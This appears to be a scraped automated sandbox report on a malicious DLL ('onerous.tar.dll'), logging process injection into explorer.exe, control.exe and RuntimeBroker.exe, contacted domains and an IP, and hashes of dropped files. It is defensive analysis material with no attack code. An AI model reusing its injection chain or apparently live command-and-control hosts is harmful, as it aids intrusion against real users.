Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 736E1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 736E1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 736E1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 736E1580
Source: C:\Windows\System32\control.exe	Thread created: unknown EIP: 736E1580

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3388 base: 10AE000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3388 base: 7FFB736E1580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3388 base: 1280000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3388 base: 7FFB736E1580 value: 40	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: unknown protection: execute and read and write

Analysis Report onerous.tar.dll

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Source: C:\Windows\System32\loaddll32.exe	Thread register set: target process: 4672	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3388	Jump to behavior
Source: C:\Windows\explorer.exe	Thread register set: target process: 3668
Source: C:\Windows\explorer.exe	Thread register set: target process: 4376
Source: C:\Windows\explorer.exe	Thread register set: target process: 4588
Source: C:\Windows\explorer.exe	Thread register set: target process: 5964
Source: C:\Windows\System32\control.exe	Thread register set: target process: 5036

Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6578712E0	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 1060000	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6578712E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 10AE000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFB736E1580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 1280000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFB736E1580	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 6E40E02000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580

Source: explorer.exe, 00000021.00000000.400884078.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000021.00000000.401136187.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.426842454.000001FC11790000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000021.00000000.401136187.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.426842454.000001FC11790000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000021.00000000.401136187.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.426842454.000001FC11790000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000021.00000000.401136187.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.426842454.000001FC11790000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Name	IP	Active
c56.lepini.at	47.241.19.44	true
api10.laptok.at	47.241.19.44	true

ID:	322295
Product:	CloudBasic
Start time:	21:18:13
Start date:	24.11.2020
Sample:	onerous.tar.dll
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	79d81979dbbd1c8ceb04cc80a903ecd1
SHA1:	f40959018e132fb1430f77a26903af222244676c
SHA256:	5dd2f21b81330a342fe1bb9a17a8fde423928e266d4842887f8b41e5d7c2fbd6
Filetype:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{C152A98E-2EDD-11EB-90E4-ECF4BB862DED}.dat	Microsoft Word Document	A3C986346E381979C8B7FF0E295E4A1C	E0C81809FAB44BA2F42D1BD0385210480A21747D	F5360641C2C41DF8CB888BEA48789AACE3A6E0EB5E17AE74431EE61EE4121098
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{DC6A3E1D-2EDD-11EB-90E4-ECF4BB862DED}.dat	Microsoft Word Document	27CB7067349AD628F3167C98BE8BA56E	67A8CBE516489D9A23666BB973040CA03FAD967C	523D34792AB0EA3E62C208306C40EB049E011004AB7ACE7044119938002D4940
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C152A990-2EDD-11EB-90E4-ECF4BB862DED}.dat	Microsoft Word Document	C0D309DF982E079C8D13B71F3742CDE8	3C0C8B011F7D3A9FA4A918993249212EE98A2423	FB865E3D5572506172E428FF5C8181FEB5F7E5F691E4D34E9039FE0679C389C7
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DC6A3E1F-2EDD-11EB-90E4-ECF4BB862DED}.dat	Microsoft Word Document	33231CC9EC2C9C3202D8F3B8BBAC1B9E	E6147AEC076FB9CC8BB3B211B31F3FC2D823E670	535C6F8B2D99A2344A1E6103C675F9A4B3A60E6F443B0FA8335887837A347631
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DC6A3E21-2EDD-11EB-90E4-ECF4BB862DED}.dat	Microsoft Word Document	6F4D8329020DDEA4354B398FF20C7AAE	5BEF65ED9DD663598B49B2B8F730C056E48333C8	93F57556211625DF04ABAC6D2EA6A1C267D8B02ECA56401612B13FF88D86D342
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E26E6CA8-2EDD-11EB-90E4-ECF4BB862DED}.dat	Microsoft Word Document	E5DECC73807B0E0B79C71BACA4C7DB4B	DAA38D791EB71D2F9B44C59915522C46816C92BA	0950B5299958686489E3F258393C6AB71E732D7BE3C4FF041592E3BFD52B5694
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	1BE4A1F7F451CEEBE27D331E3F75EB62	30BD0677580A78C32576AED6973579E27BB3439F	F313CA1F1598B33E2116F6DB66C205BFF45876EB41BBB53653E8C4E063DFF943
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	8BA10CB684BCA2596B80CDF6672B8AED	E18BD4F47888E0B4E89B5A45FF4ED5A87C1C26D5	04065D56E43CD36AA4E36B26061C33D534291B08879915E12D467328A8E06643
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	7CA8697F7CC6EB2AE1AD1DCDEFE99E45	FE5A3DC46C2A5F559D395DF4A0E6D6140ED664E6	8ADD093CCA9896A3CCD685494F209190B74DC4E66288CF2A2E2AE0E57D8C76D6
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	E94C54A3D22944401298F92C5A9D0942	7F64BAAE56143B754270302263834AF185A92FBF	620A689C180141218B225E5F23631CAD9435B50797B2D5CAC945AC1C4A404E29
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	22A263B499DB5D19998731111CA9B90D	9EC32CAB0B18DC969117CE0D2F0D6363566E8565	819997C6EE7A94F7A998BFC8DBA2FED8AF1B99F8A28627EFC98240852AF257B8
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	74D54AEF719C33D18E3B3ABB0CA5BAAC	A94F71BE8198C097B5E82DE0F1D3FD80A58CE94E	3106D23C3F43BBE6E7303878930A376216223BA71FB35F303300D38CDEC888F2
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	663C96EF5063DF9CDE299E8DA5CBDBFF	38F6EA7AC5756E43A0815E73D3A0D423E6927C5D	278F923B5FECB5C0405D1C6CEDC3BF5F5E73D21374EC8EB9D20683334295C3AD
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	ED9176B3D75A7C27CB5763C41A1AE91D	D1EB120E09624DB29FD74251D32DA4392A1E7F5C	D585B4EEF70FA5D1E181D5789B46113207663E3820ADBF83DC2ADA049AD642D0
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	0BAE92F55D07580AACAF7BB17C6423C7	0327680EBC8E79B6C957F3116FC9A8A33C5EC000	ABB47EDD851CC71FB9D738D3B586FAE86FA4F430420874E1BD46D0B6481328DF
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\c[1].htm	ASCII text, with very long lines, with no line terminators	E69A66BA1BFF6972458D1BC41252EE98	262423E195EE52FE55A2FA3CCD97E9B6619117A5	F1D70F929CDCB80F5CD8AAE9F8A41AB63FA171F224206A020596F73E88E384B2
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\down[1]	PNG image data, 15 x 15, 8-bit colormap, non-interlaced	C4F558C4C8B56858F15C09037CD6625A	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[1]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	D65EC06F21C379C87040B83CC1ABAC6B	208D0A0BB775661758394BE7E4AFB18357E46C8B	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ErrorPageTemplate[1]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	F4FE1CB77E758E1BA56B8A8EC20417C5	F4EDA06901EDB98633A686B11D02F4925F827BF0	8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\bullet[1]	PNG image data, 15 x 15, 8-bit colormap, non-interlaced	26F971D87CA00E23BD2D064524AEF838	7440BEFF2F4F8FABC9315608A13BF26CABAD27D9	1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\xxdXe7[1].htm	ASCII text, with very long lines, with no line terminators	AB868B345CA418AA4FACC6D46BD38178	A0A4189DC35EF39534A2EE41980275348B7AA8EE	DAA9372E5A21C9079A646855110C83154D77B5E6DF2F37E949EA8452ABC1EF27
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\background_gradient[1]	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3	20F0110ED5E4E0D5384A496E4880139B	51F5FC61D8BF19100DF0F8AADAA57FCD9C086255	1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[1]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	9234071287E637F85D721463C488704C	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\7[1].htm	ASCII text, with very long lines, with no line terminators	BF32F421FA2847FAA8DB0BE9201BA6DE	FD7A60D7431272DD5906940F08933E9A86A4283B	FCA7FA4DFFAD605B97E30A75F5847E54E1B16D89B13C2542ACA5B1208F400F9A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\http_404[1]	HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	F65C729DC2D457B7A1093813F1253192	5006C9B50108CF582BE308411B157574E5A893FC	B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\info_48[1]	PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced	5565250FCC163AA3A79F0B746416CE69	B97CC66471FCDEE07D0EE36C7FB03F342C231F8F	51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	1F1446CE05A385817C3EF20CBD8B6E6A	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	13AF6BE1CB30E2FB779EA728EE0A6D67	F33581AC2C60B1F02C978D14DC220DCE57CC9562	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.0.cs	UTF-8 Unicode (with BOM) text	D318CFA6F0AA6A796C421A261F345F96	8CC7A3E861751CD586D810AB0747F9C909E7F051	F0AC8098FC8D2D55052F4EA57D9B57E17A7BF211C3B51F261C8194CECB6007E2
C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	2DB8879E193202C9BF2E53E6BFED2AA0	B70B1517052DE8E7C4936A6032542D18B2000AA0	01A4228FF2F9F3B587C24468C7F3EE08DC64259C9BDC1E4FA0AD35F6BBDAB4B9
C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	A5F27D62E9CA8D216BD8677A014C1E9F	48745A1788FDCCBF3BE6F7BEC72A926A28E1CA99	623AB8A49F0ED911BF70DA44A71F47EBB1BDCE091A80B4C77EB25E60337D7451
C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.out	ASCII text, with CRLF, CR line terminators	83B3C9D9190CE2C57B83EEE13A9719DF	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
C:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP	MSVC .res	52FBC8B242036E953D34FB77648B8CA7	44B9D1FABA6237FD3EC21C1CB5EA552BE904EB25	A414B782A372D8D104F08A38DD596DA5D4F2A1A2E251EB596000D28CB6A808E2
C:\Users\user\AppData\Local\Temp\JavaDeployReg.log	ASCII text, with CRLF line terminators	C761F30D7AA0B615632114F8048E36F6	0654CFC40DA2F1F93E8EF23E8E5BEF11ADC3FF8B	429DF2245415C117E29A61D8C318D5A8037D13458A0A326208BF1058A2FB91CB
C:\Users\user\AppData\Local\Temp\RES8664.tmp	data	F312FDCCB14F8E901F73C2077C51793C	18ADB28339D8CE374944AD74AC42447CF8595A02	07DE661EE9480141E11DC5B82CC0B16B6D632C83B8FB583C4879CAA09ACACA42
C:\Users\user\AppData\Local\Temp\RES9384.tmp	data	E50A6C8BC0F94622EB97ABF57EF8D1C6	F5735A7C74B6CF1930CB6AF6F7FCC01EF275121D	D18B307D5E7E38D78D1C0D868BEF19307AA4D60CDB225537773D740C8E1AC4A1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pvnvbiu0.gck.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5u3jvqp.syn.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP	MSVC .res	94D1679D1D4FEFD1EF2E72D0E7ABF5B2	AAC4640124B24ED06E8D7588C04AFCC9F534D707	4C6512C3975A9BC03A4D0D45FF7274B75EFA247D42475BA3252FC6C288290AD5
C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.0.cs	UTF-8 Unicode (with BOM) text	216105852331C904BA5D540DE538DD4E	EE80274EBF645987E942277F7E0DE23B51011752	408944434D89B94CE4EB33DD507CA4E0283419FA39E016A5E26F2C827825DDCC
C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	9EA6B9D595456E5B23DEA4B11806F78F	C4487B9542B629D31FC73B8CADD37D6C4CDA53D1	D85066A82597D6622DE17EEC3E20F97C87204B48220F99A7B19899C0B663A34E
C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	9E447BB5EA9933E1D20CB71DC2AC790A	C1D58647C580554A60A6027018CEE3C39143C2EE	BA93835763E0E4FB5CFD4E71738E1E8205ED15F550E6E72848FFC8B9D7617FF9
C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.out	ASCII text, with CRLF, CR line terminators	83B3C9D9190CE2C57B83EEE13A9719DF	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
C:\Users\user\AppData\Local\Temp\~DF69EAEE788C6BF5D7.TMP	data	A8F2EDC39A71827BE0EBE0795F23702B	5CA5DDA74C4A1FA538C7E54A0EB745379DF3FA48	E63BCE665483F60D0B6135DFA320890A758390B6D3ACF556563187FF1CA23455
C:\Users\user\AppData\Local\Temp\~DF88E050867DE26AD2.TMP	data	D072772A8EE6BB1D1F40D9F5810CFF5B	D59BFDF035410E69B594CE06D30CCA46732FA6CD	3F8E3C2F24061C4B5041DE82829E4B1ECABC0338722626233D521A0CE1FA869D
C:\Users\user\AppData\Local\Temp\~DF9DD6CD76C3034B75.TMP	data	E5745EA6BA7E4FCBEBAC1A667C4DF152	BC748E222B6BE84EC4F67D6E787E50FBAAFA5E84	F9BBCDB0B367EBB17FF40AFBDD2B55D72775108F9B6E38181AD312A88991CF5D
C:\Users\user\AppData\Local\Temp\~DF9E03A6049D0A4DEF.TMP	data	A36E3BD3176E8121DAF8BB5140F5CD5B	D9C2E1221385DFF800CF7AC01C92B6035A39C0A8	5A5217CFCB402B08114E5626D8907C6E824B70AF52052D039DA21FEC0E7F88F7
C:\Users\user\AppData\Local\Temp\~DFAC17D42899691A13.TMP	data	AC5213F1863C119F6DC3196DBCE0DCA1	2D2271EFA95BB84F2D563E7FEBFC833838DA7B5A	781CE28AABCE64773A6A515B04402D7C45EF6F4848CC9609F05B630728654E0E
C:\Users\user\AppData\Local\Temp\~DFCE3757A75A0E50D1.TMP	data	04821721DBA30A21E2778D6D8165C437	F18DE01A4E972ABB977A9108572EBB8BBE6E6BBB	5AC06ED84B93E8CA9B61369AC493D891C7CA33133B6672B2C3892E8259E5E9C8
C:\Users\user\Documents\20201124\PowerShell_transcript.065367.Gk+Yclh6.20201124212019.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	5C19B735B25E4683C49EC53AF83C7ACA	05EF721AC886A6BDC1F239F8D80C419B5F09ECAC	172C5E835C804347540CC631E478CF6F6BD8F9A5050332C68D897F73D9A00DA1